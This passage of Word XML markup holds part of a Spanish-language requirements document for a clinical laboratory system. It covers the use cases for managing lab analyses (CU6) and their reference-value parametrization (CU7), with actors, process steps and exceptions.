                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.3 Los campos llenados no son los tipos requeridos o existe algún campo en blanco.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00491F38"/>
    <w:p w:rsidR="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00491F38"/>
    <w:p w:rsidR="00BB4BD8" w:rsidRDefault="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="398E98" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc454371312"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRPr="00B22307" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:r w:rsidRPr="00B22307">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B1D4248" wp14:editId="1C849CF3">
            <wp:extent cx="5774999" cy="2381250"/>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9617" cy="2383154"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="9063" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2243"/>
        <w:gridCol w:w="6820"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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43" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU6</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. Gestionar </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>análisis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Manipular información acerca de los análisis que ofrece el laboratorio clínico.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:spacing w:line="120" w:lineRule="exact"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permite crear, modificar y dar de baja los análisis dentro del laboratorio clínico.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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43" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Administrador del sistema</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00F82019"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491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Registrar Análisis </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir nombre del análisis</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="18"/>
              </w:num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Descripción de análisis </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="792"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Nuevo </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="003D7B79">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="003D7B79" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="792"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir datos</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Parametrización</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="003D7B79" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Guardar  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Modificar Análisis </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Seleccionar el análisis</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00B22307" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="360"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B22307">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">2.2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Modificar </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38"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CU20. Gestionar tipos de muestra</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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CU21. Gestionar parametrización  de análisis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="284"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6820" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00F82019"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.2. Existe un análisis con el mismo nombre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00491F38"/>
    <w:p w:rsidR="00491F38" w:rsidRDefault="007E1287" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc454371313"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar p</w:t>
      </w:r>
      <w:r w:rsidR="00491F38">
        <w:t>arametrización de análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRPr="003E4AF1" w:rsidRDefault="00491F38" w:rsidP="00491F38">
      <w:r w:rsidRPr="00DC19D9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2685D31F" wp14:editId="7701129E">
            <wp:extent cx="5612130" cy="1396233"/>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1396233"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2243"/>
        <w:gridCol w:w="6555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491F38" w:rsidRPr="003E4AF1" w:rsidTr="00BB4BD8">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43" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00E06F9C" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E06F9C">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00E06F9C" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU7</w:t>
            </w:r>
            <w:r w:rsidRPr="00E06F9C">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>. Gestionar parametrización de análisis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD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243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Gestiona los valores de referencia de cada análisis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permite ver, gestionar los valores de referencia de cada análisis que se realiza en el laboratorio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD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43" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Administrador del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Actor </w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD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243" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6555" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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CU18. Gestionar análisis </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="00BB4BD8">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
